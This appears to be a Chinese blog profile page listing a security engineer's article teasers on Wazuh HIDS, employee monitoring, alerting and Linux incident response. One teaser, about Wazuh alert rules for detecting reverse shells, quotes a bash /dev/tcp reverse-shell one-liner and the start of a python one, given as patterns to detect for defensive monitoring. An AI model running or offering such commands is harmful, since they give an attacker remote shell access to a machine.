240 发简信
IP属地:湖北
  • 安全工程师如何快速适应新企业及一些新员工感悟

    加入MT刚好3个月整,来记录一些自己的发现和感悟。 入职第一周-如何快速进入工作状态 和所有新人一样,公司的新人培训计划提供了很多了解公司以及如...

  • Wauzh原理简析及audit规则风险评估

    HIDS基本原理 熟悉HIDS的朋友应该了解,服务器的shell监控一般有两种,一种依靠Linux的audit审计功能,比如Wazuh,一种是重...

  • 企业安全-浅谈员工行为监控

    我目前就职于一家私企的安全部,主要做安全审计的工作,很多公司的离职流程没有考虑过员工的异常行为审计,18年我在逛微博的时候看到google的一条...

  • Resize,w 360,h 240
    Wauzh自定义反弹shell告警规则

    常见反弹: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...

  • Wazuh配置使用腾讯企业邮箱告警

    测试环境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服务器上安装postfii及相关...

  • Resize,w 360,h 240
    开源HIDS-Wauzh功能测试

    一、Wazuh 守护进程及工具进程 守护进程 ossec-agentd https://documentation.wazuh.com/3.10...

  • 开源HIDS-Wauzh测试使用

    Wazuh简介 前端时间调研了一些HIDS的开源系统: https://github.com/Neo23x0/Fenrir更加方便(不需要安装代...

  • 应急响应-Linux应急排查手册

    账号排查 grep :0: /etc/passwd #检查是否产生了新用户,和UID、GID为0的用户 stat /etc/passwd #检查...

  • git blame使用

    命令名称: git-blame - 显示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...

个人介绍
从甲方安全到乙方安全,记录自己的企业安全成长史
切记沉住气,三思而后行